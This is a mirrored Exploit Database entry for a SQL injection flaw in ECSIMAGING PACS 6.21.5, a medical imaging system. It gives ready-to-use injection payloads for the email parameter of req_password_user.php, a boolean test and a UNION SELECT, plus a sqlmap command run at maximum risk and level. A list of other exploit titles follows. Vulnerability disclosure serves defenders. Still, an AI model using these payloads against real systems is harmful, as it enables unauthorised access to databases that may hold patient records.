ECSIMAGING PACS 6.21.5 – SQL injection

Exploit Database
15 阅读

作者： shoxxdj

日期： 2021-01-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/49392/

# Exploit Title: ECSIMAGING PACS 6.21.5 - SQL injection
# Date: 06/01/2021
# Exploit Author: shoxxdj
# Vendor Homepage: https://www.medicalexpo.fr/
# Version: 6.21.5 and bellow ( tested on 6.21.5,6.21.3 )
# Tested on: Linux

ECSIMAGING PACS Application in 6.21.5 and bellow suffers fromSQLinjection vulnerability
The parameter email is sensitive to SQL Injection (selected_db can be leaked in the parameters )

Payload example : /req_password_user.php?email=test@test.com' OR NOT 9856=9856-- nBwf&selected_db=xtp001
/req_password_user.php?email=test@test.com'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+&selected_db=xtp001

SQLMAP :sqlmap.py -u '<URL>/req_password_user.php?email=test@test.com&selected_db=xtp001' --risk=3 --level=5

last Exploits
ECSIMAGING PACS 6.21.5 – SQL injection的更多信息

WordPress Plugin Import CSV 1.0 – Directory Traversal：
Joomla! Component NinjaMonials – Blind SQL Injection：
Invision Power Board (IP.Board) 3.3.4 – Unserialize Regex Bypass：
RazorCMS 1.2.1 STABLE – Arbitrary File Upload：
WordPress Plugin SEO by Yoast 1.7.3.3 – Blind SQL Injection：
Monitoring System (Dashboard) 1.0 – ‘uname’ SQL Injection：
StivaSoft Stiva SHOPPING CART 1.0 – ‘demo.php’ Cross-Site Scripting：
Immophp 1.1.1 – Cross-Site Scripting / SQL Injection：